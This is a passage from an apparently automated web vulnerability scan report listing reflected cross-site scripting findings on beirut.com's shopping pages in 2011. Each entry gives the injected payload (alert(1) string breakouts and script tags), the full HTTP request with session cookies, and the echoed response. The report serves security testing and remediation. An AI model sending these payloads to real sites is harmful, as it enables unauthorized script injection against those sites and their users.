Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60164

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping8e97f'-alert(1)-'9e3197d8b3e/Clothing-Accessories/194367784/Hair-Wigs/73';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.818. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Hair-Wigs/73

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8b92'-alert(1)-'a5a25c7e335 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessoriesd8b92'-alert(1)-'a5a25c7e335/194367784/Hair-Wigs/73 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:16:52 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55528

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessoriesd8b92'-alert(1)-'a5a25c7e335/194367784/Hair-Wigs/73';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.819. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Hair-Wigs/73

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9663e<script>alert(1)</script>bcca74b079b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessories9663e<script>alert(1)</script>bcca74b079b/194367784/Hair-Wigs/73 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:17:11 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55504

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessories9663e<script>alert(1)</script>bcca74b079b <a href="#" id="backlink">
...[SNIP]...

4.820. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Hair-Wigs/73

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce379'-alert(1)-'2fd43d9f88b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784ce379'-alert(1)-'2fd43d9f88b/Hair-Wigs/73 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:25:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Clothing-Accessories/194367784ce379'-alert(1)-'2fd43d9f88b/Hair-Wigs/73';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.821. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Hair-Wigs/73

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2bf5'-alert(1)-'1ade1d40b1b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784/Hair-Wigsb2bf5'-alert(1)-'1ade1d40b1b/73 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:36:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55485

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Clothing-Accessories/194367784/Hair-Wigsb2bf5'-alert(1)-'1ade1d40b1b/73';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.822. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Hair-Wigs/73

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74b7c'-alert(1)-'bd3a9de6948 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784/Hair-Wigs/7374b7c'-alert(1)-'bd3a9de6948 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:45:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessories/194367784/Hair-Wigs/7374b7c'-alert(1)-'bd3a9de6948';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.823. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hats/56 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Hats/56

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9edbf"><a>45613fea63f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping9edbf"><a>45613fea63f/Clothing-Accessories/194367784/Hats/56 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:11:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59592

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping9edbf"><a>45613fea63f">
...[SNIP]...

4.824. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hats/56 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Hats/56

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88d2b'-alert(1)-'ccf15a8868f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping88d2b'-alert(1)-'ccf15a8868f/Clothing-Accessories/194367784/Hats/56 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:22:50 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping88d2b'-alert(1)-'ccf15a8868f/Clothing-Accessories/194367784/Hats/56';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.825. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hats/56 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Hats/56

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ceec0'-alert(1)-'cd4395f2887 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessoriesceec0'-alert(1)-'cd4395f2887/194367784/Hats/56 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:30:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Clothing-Accessoriesceec0'-alert(1)-'cd4395f2887/194367784/Hats/56';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.826. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hats/56 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Hats/56

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d9583<script>alert(1)</script>c8095bff225 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessoriesd9583<script>alert(1)</script>c8095bff225/194367784/Hats/56 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:30:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessoriesd9583<script>alert(1)</script>c8095bff225 <a href="#" id="backlink">
...[SNIP]...

4.827. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hats/56 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Hats/56

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ffcbd'-alert(1)-'88666a01ca5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784ffcbd'-alert(1)-'88666a01ca5/Hats/56 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:38:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Clothing-Accessories/194367784ffcbd'-alert(1)-'88666a01ca5/Hats/56';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.828. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hats/56 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Hats/56

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5513'-alert(1)-'9dfda8414f2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784/Hatsb5513'-alert(1)-'9dfda8414f2/56 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:49:52 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Clothing-Accessories/194367784/Hatsb5513'-alert(1)-'9dfda8414f2/56';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.829. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hats/56 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Hats/56

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 493a4'-alert(1)-'0257898faf5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Clothing-Accessories/194367784/Hats/56493a4'-alert(1)-'0257898faf5 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:53:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55302

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessories/194367784/Hats/56493a4'-alert(1)-'0257898faf5';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.830. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Jewelry/23 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Jewelry/23

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3edbc'-alert(1)-'89c35d638a0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping3edbc'-alert(1)-'89c35d638a0/Clothing-Accessories/194367784/Jewelry/23 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
